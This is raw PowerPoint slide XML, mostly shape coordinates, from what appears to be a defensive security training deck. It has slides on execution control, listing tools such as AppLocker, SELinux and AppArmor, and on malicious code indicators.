                    <a:pt x="804520" y="2858843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767889" y="2830939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731806" y="2802110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696288" y="2772360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="661354" y="2741689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627021" y="2710099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593307" y="2677594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560230" y="2644174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527807" y="2609841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496056" y="2574599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464995" y="2538448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434641" y="2501392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404772" y="2463100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375968" y="2424282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348228" y="2384955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321552" y="2345139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295940" y="2304853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271391" y="2264116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247907" y="2222948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225485" y="2181367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204127" y="2139393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183833" y="2097045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164601" y="2054342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146432" y="2011303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129325" y="1967947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113281" y="1924294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98299" y="1880363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84380" y="1836173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71522" y="1791742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59726" y="1747091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48992" y="1702239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39319" y="1657203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30707" y="1612005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23157" y="1566662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16667" y="1521195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11238" y="1475621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6870" y="1429961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3562" y="1384234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1315" y="1338458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="1292653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1246838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932" y="1201032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="1155255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5975" y="1109525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10085" y="1063861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15255" y="1018284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21483" y="972811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28770" y="927463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37116" y="882258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46520" y="837215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56983" y="792354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68503" y="747694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81082" y="703254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94718" y="659053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109412" y="615111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125163" y="571446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141971" y="528077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159837" y="485024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178759" y="442307"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198738" y="399943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219774" y="357953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241866" y="316355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265014" y="275168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289218" y="234413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314478" y="194107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340794" y="154271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368166" y="114923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396593" y="76082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426075" y="37768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456612" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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329928" y="4937760"/>
              <a:ext cx="1106805" cy="882650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1106804" h="882650">
                  <a:moveTo>
                    <a:pt x="986536" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="119888" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82011" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49103" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23144" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6116" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6116" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23144" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49103" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82011" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119888" y="882395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="986536" y="882395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024412" y="874904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057320" y="854037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083279" y="822210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100307" y="781836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106424" y="735329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106424" y="147065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100307" y="100559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083279" y="60185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1057320" y="28358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024412" y="7491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="986536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9711308" y="5169154"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>03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514843" y="6571488"/>
            <a:ext cx="1106805" cy="882650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1106804" h="882650">
                <a:moveTo>
                  <a:pt x="986535" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119887" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82011" y="7491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49103" y="28358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23144" y="60185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116" y="100559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="735329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116" y="781836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23144" y="822210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49103" y="854037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82011" y="874904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119887" y="882395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986535" y="882395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024412" y="874904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057320" y="854037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083279" y="822210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100307" y="781836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1106424" y="735329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1106424" y="147065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100307" y="100559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083279" y="60185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057320" y="28358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024412" y="7491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986535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895590" y="6820027"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>02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541264" y="4924044"/>
            <a:ext cx="1106805" cy="882650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1106804" h="882650">
                <a:moveTo>
                  <a:pt x="986536" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119887" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82011" y="7491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49103" y="28358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23144" y="60185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116" y="100559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="735329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6116" y="781836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23144" y="822210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49103" y="854037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82011" y="874904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119887" y="882395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986536" y="882395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024412" y="874904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057320" y="854037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083279" y="822210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100307" y="781836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1106424" y="735329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1106424" y="147065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100307" y="100559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083279" y="60185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057320" y="28358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024412" y="7491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986536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921502" y="5171948"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>01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81148" y="5223764"/>
            <a:ext cx="251206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Privilege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Escalation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97573" y="7942580"/>
            <a:ext cx="3262629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Improper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Input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Handling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750422" y="5239004"/>
            <a:ext cx="193103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1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Han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ng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53883" y="4675632"/>
            <a:ext cx="1348740" cy="1348739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35928" y="306451"/>
            <a:ext cx="31857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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-12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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Control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69508" y="760476"/>
            <a:ext cx="4320540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117217" y="2508504"/>
            <a:ext cx="12563475" cy="4038600"/>
            <a:chOff x="2117217" y="2508504"/>
            <a:chExt cx="12563475" cy="4038600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2205228" y="2508504"/>
              <a:ext cx="4320540" cy="577850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="577850">
                  <a:moveTo>
                    <a:pt x="4224274" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96266" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58775" y="7558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28178" y="28178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7558" y="58775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="96266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="577596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="577596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="96266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312981" y="58775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4292361" y="28178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4261764" y="7558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4224274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126742" y="2978658"/>
              <a:ext cx="12544425" cy="3558540"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="3558540">
                  <a:moveTo>
                    <a:pt x="12251690" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="292353" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244943" y="3827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199965" y="14908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158020" y="32640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119713" y="56420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85645" y="85645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56420" y="119713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32640" y="158020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14908" y="199965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3827" y="244943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="292353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3266185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3827" y="3313596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14908" y="3358574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32640" y="3400519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56420" y="3438826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85645" y="3472894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119713" y="3502119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158020" y="3525899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199965" y="3543631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244943" y="3554712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292353" y="3558540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12251690" y="3558540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12299100" y="3554712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12344078" y="3543631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12386023" y="3525899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12424330" y="3502119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12458398" y="3472894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12487623" y="3438826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511403" y="3400519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12529135" y="3358574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12540216" y="3313596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="3266185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="292353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12540216" y="244943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12529135" y="199965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511403" y="158020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12487623" y="119713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12458398" y="85645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12424330" y="56420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12386023" y="32640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12344078" y="14908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12299100" y="3827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122516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126742" y="2978658"/>
              <a:ext cx="12544425" cy="3558540"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="3558540">
                  <a:moveTo>
                    <a:pt x="0" y="292353"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3827" y="244943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14908" y="199965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32640" y="158020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56420" y="119713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85645" y="85645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119713" y="56420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158020" y="32640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199965" y="14908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244943" y="3827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292353" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12251690" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12299100" y="3827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12344078" y="14908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12386023" y="32640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12424330" y="56420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12458398" y="85645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12487623" y="119713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511403" y="158020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12529135" y="199965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12540216" y="244943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="292353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="3266185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12540216" y="3313596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12529135" y="3358574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12511403" y="3400519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12487623" y="3438826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12458398" y="3472894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12424330" y="3502119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12386023" y="3525899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12344078" y="3543631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12299100" y="3554712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12251690" y="3558540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292353" y="3558540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244943" y="3554712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199965" y="3543631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158020" y="3525899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119713" y="3502119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85645" y="3472894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56420" y="3438826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32640" y="3400519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14908" y="3358574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3827" y="3313596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3266185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="292353"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050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287904" y="2576575"/>
            <a:ext cx="11984990" cy="37655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570">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="8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dirty="0" sz="2200" spc="8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se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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Ex</a:t>
            </a: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cutio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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Contr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8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Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="147955" marR="5080">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pP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Execution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control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analyzes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additional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software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scripts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installed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host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beyond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baseline.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enforced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using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third-party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security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products,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such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as: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00">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="490855" indent="-343535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490855" algn="l"/>
                <a:tab pos="491490" algn="l"/>
              </a:tabLst>
            </a:pP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Software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Restriction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Policies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(SRP)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="490855" indent="-343535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 MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="490855" algn="l"/>
                <a:tab pos="491490" algn="l"/>
              </a:tabLst>
            </a:pP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AppLocker</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="490855" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="490855" algn="l"/>
                <a:tab pos="491490" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>W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ndows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Defender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Appl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cati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Contr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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(W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AC)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="490855" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="490855" algn="l"/>
                <a:tab pos="491490" algn="l"/>
              </a:tabLst>
            </a:pP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SELinux</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="490855" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="490855" algn="l"/>
                <a:tab pos="491490" algn="l"/>
              </a:tabLst>
            </a:pP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AppArmor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2508" y="306451"/>
            <a:ext cx="45700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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Indicators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7676" y="760476"/>
            <a:ext cx="6263639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999988" y="3997452"/>
            <a:ext cx="3695700" cy="3683635"/>
